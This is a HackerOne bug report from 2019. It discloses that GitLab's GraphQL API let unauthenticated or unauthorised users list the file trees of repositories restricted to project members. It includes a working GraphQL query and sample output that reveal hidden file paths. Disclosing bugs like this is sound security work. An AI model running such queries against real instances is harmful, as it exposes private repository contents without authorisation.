Restricted repo trees can be scanned via GraphQL
HackerOne report #614453 by xanbanx
on 2019-06-14, assigned to jmatos_bgtvf
:
Summary
GitLab added a new GraphQL API to query the repo tree. However, this API does not respect the user permissions. For repos with restricted access, any user who has access to the project, but not to the repo, can query the repo tree via the GraphQL API.
This happens for:
- Public projects with repositories set to
Project Members
only - Internal projects with repositories set to
Project Members
only - Private projects where guest users do not have access to the repository
Steps to reproduce
(Step-by-step guide to reproduce the issue, including:)
- Create a public repo, with the repository restricted to project members only and push some code
- As an unauthenticated user, perform the following graphql request. You can do that for example using the GitLab inbuilt GraphQL explorer.
{
project(fullPath: "<namespace>/<project-name>") {
id
repository {
empty
exists
rootRef
tree {
blobs {
edges {
node {
id
flatPath
path
type
webUrl
}
}
}
}
}
}
}
- Although you are unauthenticated and the repo access is restricted to project members only, you receive the repository tree like for example
{
"data": {
"project": {
"id": "gid://gitlab/Project/1",
"repository": {
"empty": false,
"exists": true,
"rootRef": "master",
"tree": {
"blobs": {
"edges": [
{
"node": {
"id": "f754ff5ab666e7bce419a8184ec9ba54c15852b2",
"flatPath": "Readme.md",
"path": "Readme.md",
"type": "blob",
"webUrl": "https://example.gitlab.net/test/test-repo/blob/88340bca02ab25c8356258f9540d281295cdda8/README.md"
}
},
{
"node": {
"id": "536aca34dbae6b2bca83bebdcba83543c9546f0",
"flatPath": "secret",
"path": "secret",
"type": "blob",
"webUrl": "https://example.gitlab.net/test/test-repo/blob/88340bca02ab25c8356258f9540d281295cdda8/secret"
}
}
]
}
}
}
}
}
}
Examples
This happens on GitLab.com tested on 12.0.0-pre d56096df9a5. You can use the repo wter23/repo-restricted
on gitlab.com to reproduce that behavior. This public project has the repo restricted to project members only and therefore does not show up in the user interface. However, GraphQL allows you to crawl the repository tree .
What is the current bug behavior?
Unauthorized users have access to the project tree.
What is the expected correct behavior?
Unauthorized users should not access to the project tree.
Impact
Unauthorized users, who do not have access to the repo can crawl the project tree and therefore have access to private information. I consider the repo as the heart of a GitLab project and therefore consider this as a "high" report.